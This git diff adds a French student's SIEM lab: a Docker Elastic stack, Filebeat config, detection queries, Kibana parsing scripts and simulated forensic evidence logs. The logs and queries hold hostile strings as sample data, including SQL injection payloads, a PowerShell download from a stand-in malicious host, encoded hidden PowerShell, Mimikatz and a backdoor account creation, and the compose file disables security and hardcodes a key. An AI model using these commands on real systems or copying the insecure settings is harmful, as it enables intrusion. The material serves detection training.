diff --git a/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.md b/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.md
new file mode 100644
index 0000000..f399234
--- /dev/null
+++ b/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.md
@@ -0,0 +1,235 @@
+# Lab 02 - Cybersecurity 3
+Installation Wazuh
+
+## 1. Mise en place
+
+Le `docker-compose.yml` a été modifié pour répondre aux dernières exigences ElasticSearch, incluant version, arguments et commandes d'amorçage.
+
+`filebeat.yml` a également été modifié pour la version 9.4.4.
+
+## 2. Démarrage de la stack
+
+
+
+## 3. Ingestion des logs
+
+Les fichiers sont bien placés dans le dossier local `./data` et montés en *Read-Only* dans le conteneur `filebeat`. Une rapide inspection dans le conteneur permet de retrouver les documents :
+
+```bash
+> docker exec -it filebeat bash
+
+[root@189c7e30152f filebeat]# ls
+LICENSE.txt README.md fields.yml filebeat.reference.yml kibana module
+NOTICE.txt data filebeat filebeat.yml logs modules.d
+
+[root@189c7e30152f filebeat]# pwd
+/usr/share/filebeat
+
+[root@189c7e30152f filebeat]# ls /var/log
+btmp hawkey.log lastlog powershell_eventlog.csv private webserver.log wtmp
+```
+
+## 4. Requêtes de détection
+
+On constate que les fichiers `filebeat-*` sont correctement journalisés dans ElasticSearch, avec du détail sous format JSON :
+
+
+
+```json
+{
+ "@timestamp": [
+ "2026-08-05T08:24:24.471Z"
+ ],
+ "agent.ephemeral_id": [
+ "60ae4b96-7c76-4a10-b96a-aa2926124ac2"
+ ],
+ "agent.hostname": [
+ "189c7e30152f"
+ ],
+ "agent.id": [
+ "2b9a5d07-efbf-406e-88ba-21a632984a62"
+ ],
+ "agent.name": [
+ "189c7e30152f"
+ ],
+ "agent.type": [
+ "filebeat"
+ ],
+ "agent.version": [
+ "9.4.4"
+ ],
+ "ecs.version": [
+ "8.0.0"
+ ],
+ "fields.type": [
+ "powershell"
+ ],
+ "host.name": [
+ "189c7e30152f"
+ ],
+ "input.type": [
+ "filestream"
+ ],
+ "log.file.device_id": [
+ "74"
+ ],
+ "log.file.fingerprint": [
+ "0552875f2772591c83e87ce749d75a90e9aa8aae5cc637f79755d3154df4ac37"
+ ],
+ "log.file.inode": [
+ "12103423998720744"
+ ],
+ "log.file.path": [
+ "/var/log/powershell_eventlog.csv"
+ ],
+ "log.offset": [
+ 1661
+ ],
+ "message": [
+ "\"2025-07-29T14:40:10Z\",\"4720\",\"Information\",\"Microsoft-Windows-Security-Auditing\",\"Un nouveau compte utilisateur a été créé : NomUtilisateur=hacker, Groupe=Administrateurs\""
+ ],
+ "_id": "ZOMG0Z8BjDC_E0hYQKKW",
+ "_index": ".ds-filebeat-9.4.4-2026.08.05-000001",
+ "_score": null
+}
+```
+
+Je mets à profit mon écran large et je fais un tri par champs pour avoir un détail pertinent sur les logs :
+
+
+
+A cette occasion, je corrige les requêtes pour refléter les nouvelles normes utilisées sur ElasticSearch / OpenSearch, et un référent que j'utilise qui est Datadog :
+
+```sql
+-- type:"web" AND (url:* OR query:*) AND message:"UNION SELECT"
+fields.type:web AND message:("UNION SELECT" OR "union select" OR "'1'='1")
+
+-- type:"powershell" AND (message:*"New-Object Net.WebClient"* OR message:*"Invoke-Expression"*)
+fields.type:powershell AND message:("New-Object Net.WebClient" OR "Invoke-*")
+
+-- type:"web" AND status:401
+fields.type:web AND message:(" 401 ")
+```
+
+## 6. Création du Dashboard
+
+### Créer des métriques
+
+Le seul champ reconnaissable par les logs est "message", qui contient les informations. En revanche, ElasticSearch ne gère "pas" nativement le CONTENU des messages en les compartimentant. Il faut pouvoir extraire ces données. La solution la plus efficace est de passer une instruction dans Filebeat, mais dans un vrai environnement de remontée de logs, on n'a que rarement accès à l'agent émetteur. Aussi va-t-on essayer de faire des métriques dans Kibana directement.
+
+Pour ça, je vais dans `Dev Tools > Console` et je fais, aidé de Kimi K2.7, un "Ingest Pipeline Conditionnel" :
+
+```json
+PUT _ingest/pipeline/multi_log_parser
+{
+ "description": "Détecte et sépare les logs Web et PowerShell/Windows",
+ "processors": [
+ {
+ "dissect": {
+ "description": "Parse les logs Web au format Apache/Nginx",
+ "if": "ctx.message != null && ctx.message.contains('HTTP/')",
+ "field": "message",
+ "pattern": "%{web_client_ip} - - [%{web_timestamp}] \"%{web_http_method} %{web_request_path} HTTP/%{web_http_version}\" %{web_status_code} %{web_bytes} \"%{web_referrer}\" \"%{web_user_agent}\""
+ }
+ },
+ {
+ "csv": {
+ "description": "Parse les logs Windows/PowerShell au format CSV",
+ "if": "ctx.message != null && (ctx.message.contains('Microsoft-Windows') || ctx.message.startsWith('\"202'))",
+ "field": "message",
+ "target_fields": [
+ "pws_timestamp",
+ "pws_event_id",
+ "pws_level",
+ "pws_provider",
+ "pws_message"
+ ]
+ }
+ }
+ ]
+}
+```
+
+
+
+Pas de succès. Je tente alors avec `Stack Management > Data Views > Logs` de faire des champs personnalisés :
+
+```js
+if (params._source.message != null) {
+ def msg = params._source.message;
+ if (msg instanceof List && !msg.isEmpty()) { msg = msg[0]; }
+
+ // Exécute uniquement si le message ressemble au log Windows
+ if (msg instanceof String && msg.contains('Microsoft-Windows')) {
+ String[] parts = msg.splitOnToken('","');
+ if (parts.length > 1) {
+ emit(parts[1].replace('"', '').trim()); // Extrait l'ID d'évènement
+ }
+ }
+}
+```
+
+```js
+if (params._source.message != null) {
+ def msg = params._source.message;
+ if (msg instanceof List && !msg.isEmpty()) { msg = msg[0]; }
+
+ // Exécute uniquement si le message contient une requête HTTP
+ if (msg instanceof String && msg.contains('HTTP/')) {
+ String[] parts = msg.splitOnToken(' ');
+ if (parts.length >= 9) {
+ emit(parts[8].trim()); // Extrait le code de réponse (200, 401, 403...)
+ }
+ }
+}
+```
+
+J'ai des résultats :
+
+
+
+
+
+Je peux maintenant faire un VRAI tableau avec mes métriques :
+
+
+
+Et enfin faire une visualisation :
+
+
+
+Hélas le jeu de données est
+
+## 7. Alertes automatisées
+
+Pour l'alerte demandée, je vais dans `Stack Management > Alerts and Insights > Rules` bien que ça ne soit pas très instinctif, mais pour les besoins du cours, il faudra y opérer.
+
+### Interruption
+
+
+
+Je dois rajouter un élément au `kibana.yml` du conteneur :
+
+```yml
+xpack.encryptedSavedObjects.encryptionKey: "ma_cle_secrete_super_longue_de_32_caracteres!"
+```
+
+J'édite aussi le `docker-compose.yml` pour déploiement automatique.
+
+Je définis les conditions de déclenchement (ici, très parano, faute de gros jeux de données) :
+
+
+
+Pour les actions, je suis obligé d'activer la licence d'essai 30 jours (ça va, on a le temps) mais je n'ai que deux actions de disponibles, là om il y a normalement des dizaines de choix.
+
+**POUR LES BESOINS DE L'EXERCICE** je ne peux pas générer de WorkFlow complet. En revanche je peux montrer un exemple défini sur Datadog, utilisant un Webhook paramétré dans Slack pour prévenir les utilisateurs d'une instance EC2 qui tourne à vide :
+
+
+
+J'ai déjà fait du déploiement :
+
+- Courriel
+- JIRA OpsGenie
+- Webhook Slack
+- Webhook Discord
+- Application WhatsApp pour les urgences VIP
diff --git a/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.pdf b/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.pdf
new file mode 100644
index 0000000..2f079fe
Binary files /dev/null and b/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.pdf differ
diff --git a/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.zip b/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.zip
new file mode 100644
index 0000000..b7e2e92
Binary files /dev/null and b/Semaine_12/Jour_03/BOICHE_Gauvain_Lab_03_2026_08_05.zip differ
diff --git a/Semaine_12/Jour_03/L03-forensic_lab_evidences.zip b/Semaine_12/Jour_03/L03-forensic_lab_evidences.zip
new file mode 100644
index 0000000..8f93acb
Binary files /dev/null and b/Semaine_12/Jour_03/L03-forensic_lab_evidences.zip differ
diff --git a/Semaine_12/Jour_03/L03-forensic_lab_evidences/auth_failures.csv b/Semaine_12/Jour_03/L03-forensic_lab_evidences/auth_failures.csv
new file mode 100644
index 0000000..adf95e0
--- /dev/null
+++ b/Semaine_12/Jour_03/L03-forensic_lab_evidences/auth_failures.csv
@@ -0,0 +1,6 @@
+Date,Time,SourceIP,Username,Status
+2025-07-29,13:58:01,192.168.1.100,admin,Failed
+2025-07-29,13:58:05,192.168.1.100,admin,Failed
+2025-07-29,13:58:09,192.168.1.100,root,Failed
+2025-07-29,13:58:12,192.168.1.100,root,Failed
+2025-07-29,13:58:15,192.168.1.100,root,Success
diff --git a/Semaine_12/Jour_03/L03-forensic_lab_evidences/malware_processlist.csv b/Semaine_12/Jour_03/L03-forensic_lab_evidences/malware_processlist.csv
new file mode 100644
index 0000000..bd5dd0e
--- /dev/null
+++ b/Semaine_12/Jour_03/L03-forensic_lab_evidences/malware_processlist.csv
@@ -0,0 +1,4 @@
+PID,ProcessName,CommandLine,ParentPID
+2345,svchost.exe,C:\Windows\System32\svchost.exe -k netsvcs,520
+3378,powershell.exe,powershell -nop -w hidden -enc SQB...=,2345
+3981,evil.exe,C:\Users\Public\evil.exe,3378
diff --git a/Semaine_12/Jour_03/L03-forensic_lab_evidences/powershell_eventlog.csv b/Semaine_12/Jour_03/L03-forensic_lab_evidences/powershell_eventlog.csv
new file mode 100644
index 0000000..2d8c436
--- /dev/null
+++ b/Semaine_12/Jour_03/L03-forensic_lab_evidences/powershell_eventlog.csv
@@ -0,0 +1,4 @@
+Date,Time,EventID,Message
+2025-07-29,14:05:11,4104,Script PowerShell suspect exécuté : Invoke-Mimikatz
+2025-07-29,14:07:25,4103,Commande PowerShell encodée détectée
+2025-07-29,14:09:43,4688,Nouveau processus : powershell.exe -nop -w hidden
diff --git a/Semaine_12/Jour_03/L03-forensic_lab_evidences/webserver.log b/Semaine_12/Jour_03/L03-forensic_lab_evidences/webserver.log
new file mode 100644
index 0000000..c24b39f
--- /dev/null
+++ b/Semaine_12/Jour_03/L03-forensic_lab_evidences/webserver.log
@@ -0,0 +1,10 @@
+192.168.1.10 - - [29/Jul/2025:14:10:22 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
+192.168.1.15 - - [29/Jul/2025:14:11:05 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
+192.168.1.20 - - [29/Jul/2025:14:12:44 +0000] "GET /admin HTTP/1.1" 403 721 "-" "Mozilla/5.0 (Linux; x86_64)"
+192.168.1.25 - - [29/Jul/2025:14:13:55 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
+192.168.1.30 - - [29/Jul/2025:14:14:37 +0000] "GET /wp-login.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
+192.168.1.35 - - [29/Jul/2025:14:15:19 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 1589 "-" "sqlmap/1.4.12#stable"
+192.168.1.40 - - [29/Jul/2025:14:16:45 +0000] "GET /etc/passwd HTTP/1.1" 400 231 "-" "Mozilla/5.0 (Linux; x86_64)"
+192.168.1.45 - - [29/Jul/2025:14:17:33 +0000] "GET /search.php?q= HTTP/1.1" 200 854 "-" "Mozilla/5.0 (X11; Linux x86_64)"
+192.168.1.50 - - [29/Jul/2025:14:18:07 +0000] "GET /backup.tar.gz HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
+192.168.1.60 - - [29/Jul/2025:14:19:40 +0000] "GET /index.php?id=1' OR '1'='1 HTTP/1.1" 200 512 "-" "sqlmap/1.4.12#stable"
diff --git a/Semaine_12/Jour_03/L03-powershell_eventlog.csv b/Semaine_12/Jour_03/L03-powershell_eventlog.csv
new file mode 100644
index 0000000..3d56265
--- /dev/null
+++ b/Semaine_12/Jour_03/L03-powershell_eventlog.csv
@@ -0,0 +1,11 @@
+"TimeCreated","Id","LevelDisplayName","ProviderName","Message"
+"2025-07-29T14:23:51Z","4624","Information","Microsoft-Windows-Security-Auditing","Un compte a été connecté avec succès. Sujet : NomUtilisateur=ADMIN, IP=192.168.1.45, Type de connexion=3"
+"2025-07-29T14:25:12Z","4625","Warning","Microsoft-Windows-Security-Auditing","Échec de tentative de connexion. Sujet : NomUtilisateur=TestUser, IP=192.168.1.100, Mot de passe incorrect"
+"2025-07-29T14:27:33Z","4688","Information","Microsoft-Windows-Security-Auditing","Un nouveau processus a été créé. Nom du processus : powershell.exe, Commande : powershell -ExecutionPolicy Bypass -File script.ps1"
+"2025-07-29T14:29:55Z","4689","Information","Microsoft-Windows-Security-Auditing","Un processus a été terminé. Nom du processus : powershell.exe, PID=4356"
+"2025-07-29T14:31:12Z","4104","Information","Microsoft-Windows-PowerShell","Script PowerShell exécuté : Invoke-WebRequest http://malicious-site.test/download.exe"
+"2025-07-29T14:32:45Z","4100","Warning","Microsoft-Windows-PowerShell","Échec d'exécution du script en raison de la stratégie d'exécution"
+"2025-07-29T14:34:20Z","7045","Information","Service Control Manager","Un nouveau service a été installé. Nom=SuspiciousService, Binaire=C:\\Temp\\suspect.exe"
+"2025-07-29T14:36:05Z","4688","Information","Microsoft-Windows-Security-Auditing","Un nouveau processus a été créé. Nom du processus : cmd.exe, Commande : cmd /c net user hacker /add"
+"2025-07-29T14:38:22Z","4624","Information","Microsoft-Windows-Security-Auditing","Connexion réussie depuis une session RDP, NomUtilisateur=Administrator, IP=10.0.0.15"
+"2025-07-29T14:40:10Z","4720","Information","Microsoft-Windows-Security-Auditing","Un nouveau compte utilisateur a été créé : NomUtilisateur=hacker, Groupe=Administrateurs"
diff --git a/Semaine_12/Jour_03/L03-webserver.log b/Semaine_12/Jour_03/L03-webserver.log
new file mode 100644
index 0000000..c24b39f
--- /dev/null
+++ b/Semaine_12/Jour_03/L03-webserver.log
@@ -0,0 +1,10 @@
+192.168.1.10 - - [29/Jul/2025:14:10:22 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
+192.168.1.15 - - [29/Jul/2025:14:11:05 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
+192.168.1.20 - - [29/Jul/2025:14:12:44 +0000] "GET /admin HTTP/1.1" 403 721 "-" "Mozilla/5.0 (Linux; x86_64)"
+192.168.1.25 - - [29/Jul/2025:14:13:55 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
+192.168.1.30 - - [29/Jul/2025:14:14:37 +0000] "GET /wp-login.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
+192.168.1.35 - - [29/Jul/2025:14:15:19 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 1589 "-" "sqlmap/1.4.12#stable"
+192.168.1.40 - - [29/Jul/2025:14:16:45 +0000] "GET /etc/passwd HTTP/1.1" 400 231 "-" "Mozilla/5.0 (Linux; x86_64)"
+192.168.1.45 - - [29/Jul/2025:14:17:33 +0000] "GET /search.php?q= HTTP/1.1" 200 854 "-" "Mozilla/5.0 (X11; Linux x86_64)"
+192.168.1.50 - - [29/Jul/2025:14:18:07 +0000] "GET /backup.tar.gz HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
+192.168.1.60 - - [29/Jul/2025:14:19:40 +0000] "GET /index.php?id=1' OR '1'='1 HTTP/1.1" 200 512 "-" "sqlmap/1.4.12#stable"
diff --git a/Semaine_12/Jour_03/Lab03.pdf b/Semaine_12/Jour_03/Lab03.pdf
new file mode 100644
index 0000000..9daa3b1
Binary files /dev/null and b/Semaine_12/Jour_03/Lab03.pdf differ
diff --git a/Semaine_12/Jour_03/M03-Modèle de Journal danalyse Forensique.pdf b/Semaine_12/Jour_03/M03-Modèle de Journal danalyse Forensique.pdf
new file mode 100644
index 0000000..dfd430b
Binary files /dev/null and b/Semaine_12/Jour_03/M03-Modèle de Journal danalyse Forensique.pdf differ
diff --git a/Semaine_12/Jour_03/M03-Rapport dinvenstigation.pdf b/Semaine_12/Jour_03/M03-Rapport dinvenstigation.pdf
new file mode 100644
index 0000000..996ad1f
Binary files /dev/null and b/Semaine_12/Jour_03/M03-Rapport dinvenstigation.pdf differ
diff --git a/Semaine_12/Jour_03/elastic_stack/data/powershell_eventlog.csv b/Semaine_12/Jour_03/elastic_stack/data/powershell_eventlog.csv
new file mode 100644
index 0000000..3d56265
--- /dev/null
+++ b/Semaine_12/Jour_03/elastic_stack/data/powershell_eventlog.csv
@@ -0,0 +1,11 @@
+"TimeCreated","Id","LevelDisplayName","ProviderName","Message"
+"2025-07-29T14:23:51Z","4624","Information","Microsoft-Windows-Security-Auditing","Un compte a été connecté avec succès. Sujet : NomUtilisateur=ADMIN, IP=192.168.1.45, Type de connexion=3"
+"2025-07-29T14:25:12Z","4625","Warning","Microsoft-Windows-Security-Auditing","Échec de tentative de connexion. Sujet : NomUtilisateur=TestUser, IP=192.168.1.100, Mot de passe incorrect"
+"2025-07-29T14:27:33Z","4688","Information","Microsoft-Windows-Security-Auditing","Un nouveau processus a été créé. Nom du processus : powershell.exe, Commande : powershell -ExecutionPolicy Bypass -File script.ps1"
+"2025-07-29T14:29:55Z","4689","Information","Microsoft-Windows-Security-Auditing","Un processus a été terminé. Nom du processus : powershell.exe, PID=4356"
+"2025-07-29T14:31:12Z","4104","Information","Microsoft-Windows-PowerShell","Script PowerShell exécuté : Invoke-WebRequest http://malicious-site.test/download.exe"
+"2025-07-29T14:32:45Z","4100","Warning","Microsoft-Windows-PowerShell","Échec d'exécution du script en raison de la stratégie d'exécution"
+"2025-07-29T14:34:20Z","7045","Information","Service Control Manager","Un nouveau service a été installé. Nom=SuspiciousService, Binaire=C:\\Temp\\suspect.exe"
+"2025-07-29T14:36:05Z","4688","Information","Microsoft-Windows-Security-Auditing","Un nouveau processus a été créé. Nom du processus : cmd.exe, Commande : cmd /c net user hacker /add"
+"2025-07-29T14:38:22Z","4624","Information","Microsoft-Windows-Security-Auditing","Connexion réussie depuis une session RDP, NomUtilisateur=Administrator, IP=10.0.0.15"
+"2025-07-29T14:40:10Z","4720","Information","Microsoft-Windows-Security-Auditing","Un nouveau compte utilisateur a été créé : NomUtilisateur=hacker, Groupe=Administrateurs"
diff --git a/Semaine_12/Jour_03/elastic_stack/data/webserver.log b/Semaine_12/Jour_03/elastic_stack/data/webserver.log
new file mode 100644
index 0000000..c24b39f
--- /dev/null
+++ b/Semaine_12/Jour_03/elastic_stack/data/webserver.log
@@ -0,0 +1,10 @@
+192.168.1.10 - - [29/Jul/2025:14:10:22 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
+192.168.1.15 - - [29/Jul/2025:14:11:05 +0000] "POST /login.php HTTP/1.1" 401 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
+192.168.1.20 - - [29/Jul/2025:14:12:44 +0000] "GET /admin HTTP/1.1" 403 721 "-" "Mozilla/5.0 (Linux; x86_64)"
+192.168.1.25 - - [29/Jul/2025:14:13:55 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
+192.168.1.30 - - [29/Jul/2025:14:14:37 +0000] "GET /wp-login.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
+192.168.1.35 - - [29/Jul/2025:14:15:19 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 1589 "-" "sqlmap/1.4.12#stable"
+192.168.1.40 - - [29/Jul/2025:14:16:45 +0000] "GET /etc/passwd HTTP/1.1" 400 231 "-" "Mozilla/5.0 (Linux; x86_64)"
+192.168.1.45 - - [29/Jul/2025:14:17:33 +0000] "GET /search.php?q= HTTP/1.1" 200 854 "-" "Mozilla/5.0 (X11; Linux x86_64)"
+192.168.1.50 - - [29/Jul/2025:14:18:07 +0000] "GET /backup.tar.gz HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
+192.168.1.60 - - [29/Jul/2025:14:19:40 +0000] "GET /index.php?id=1' OR '1'='1 HTTP/1.1" 200 512 "-" "sqlmap/1.4.12#stable"
diff --git a/Semaine_12/Jour_03/elastic_stack/docker-compose.yml b/Semaine_12/Jour_03/elastic_stack/docker-compose.yml
new file mode 100644
index 0000000..5af7a71
--- /dev/null
+++ b/Semaine_12/Jour_03/elastic_stack/docker-compose.yml
@@ -0,0 +1,41 @@
+services:
+ elasticsearch:
+ image: docker.elastic.co/elasticsearch/elasticsearch:9.4.4
+ container_name: elasticsearch
+ environment:
+ - discovery.type=single-node
+ - xpack.security.enabled=false
+ - "ES_JAVA_OPTS=-Xms1g -Xmx1g"
+ ports:
+ - "9200:9200"
+ healthcheck:
+ test: ["CMD-SHELL", "curl -fsS http://localhost:9200/_cluster/health >/dev/null || exit 1"]
+ interval: 30s
+ timeout: 10s
+ retries: 20
+ start_period: 30s
+
+ kibana:
+ image: docker.elastic.co/kibana/kibana:9.4.4
+ container_name: kibana
+ ports:
+ - "5601:5601"
+ depends_on:
+ elasticsearch:
+ condition: service_healthy
+ environment:
+ - ELASTICSEARCH_HOSTS=http://elasticsearch:9200
+ - xpack.encryptedSavedObjects.encryptionKey=ma_cle_secrete_super_longue_de_32_caracteres!
+
+ filebeat:
+ image: docker.elastic.co/beats/filebeat:9.4.4
+ container_name: filebeat
+ command: ["filebeat", "-e", "--strict.perms=false"]
+ user: root
+ volumes:
+ - ./data/webserver.log:/var/log/webserver.log:ro
+ - ./data/powershell_eventlog.csv:/var/log/powershell_eventlog.csv:ro
+ - ./filebeat.yml:/usr/share/filebeat/filebeat.yml:ro
+ depends_on:
+ elasticsearch:
+ condition: service_healthy
diff --git a/Semaine_12/Jour_03/elastic_stack/filebeat.yml b/Semaine_12/Jour_03/elastic_stack/filebeat.yml
new file mode 100644
index 0000000..7e41ac6
--- /dev/null
+++ b/Semaine_12/Jour_03/elastic_stack/filebeat.yml
@@ -0,0 +1,19 @@
+filebeat.inputs:
+ - type: filestream
+ id: web-logs
+ enabled: true
+ paths:
+ - /var/log/webserver.log
+ fields:
+ type: web
+
+ - type: filestream
+ id: powershell-logs
+ enabled: true
+ paths:
+ - /var/log/powershell_eventlog.csv
+ fields:
+ type: powershell
+
+output.elasticsearch:
+ hosts: ["http://elasticsearch:9200"]
diff --git a/Semaine_12/Jour_03/image-1.png b/Semaine_12/Jour_03/image-1.png
new file mode 100644
index 0000000..66a97c8
Binary files /dev/null and b/Semaine_12/Jour_03/image-1.png differ
diff --git a/Semaine_12/Jour_03/image-10.png b/Semaine_12/Jour_03/image-10.png
new file mode 100644
index 0000000..b1a9233
Binary files /dev/null and b/Semaine_12/Jour_03/image-10.png differ
diff --git a/Semaine_12/Jour_03/image-2.png b/Semaine_12/Jour_03/image-2.png
new file mode 100644
index 0000000..1b4b77b
Binary files /dev/null and b/Semaine_12/Jour_03/image-2.png differ
diff --git a/Semaine_12/Jour_03/image-3.png b/Semaine_12/Jour_03/image-3.png
new file mode 100644
index 0000000..966c92a
Binary files /dev/null and b/Semaine_12/Jour_03/image-3.png differ
diff --git a/Semaine_12/Jour_03/image-4.png b/Semaine_12/Jour_03/image-4.png
new file mode 100644
index 0000000..561717a
Binary files /dev/null and b/Semaine_12/Jour_03/image-4.png differ
diff --git a/Semaine_12/Jour_03/image-5.png b/Semaine_12/Jour_03/image-5.png
new file mode 100644
index 0000000..cd049a6
Binary files /dev/null and b/Semaine_12/Jour_03/image-5.png differ
diff --git a/Semaine_12/Jour_03/image-6.png b/Semaine_12/Jour_03/image-6.png
new file mode 100644
index 0000000..7f703fa
Binary files /dev/null and b/Semaine_12/Jour_03/image-6.png differ
diff --git a/Semaine_12/Jour_03/image-7.png b/Semaine_12/Jour_03/image-7.png
new file mode 100644
index 0000000..250e58b
Binary files /dev/null and b/Semaine_12/Jour_03/image-7.png differ
diff --git a/Semaine_12/Jour_03/image-8.png b/Semaine_12/Jour_03/image-8.png
new file mode 100644
index 0000000..71cde66
Binary files /dev/null and b/Semaine_12/Jour_03/image-8.png differ
diff --git a/Semaine_12/Jour_03/image-9.png b/Semaine_12/Jour_03/image-9.png
new file mode 100644
index 0000000..0570dac
Binary files /dev/null and b/Semaine_12/Jour_03/image-9.png differ
diff --git a/Semaine_12/Jour_03/image.png b/Semaine_12/Jour_03/image.png
new file mode 100644
index 0000000..1c892e3
Binary files /dev/null and b/Semaine_12/Jour_03/image.png differ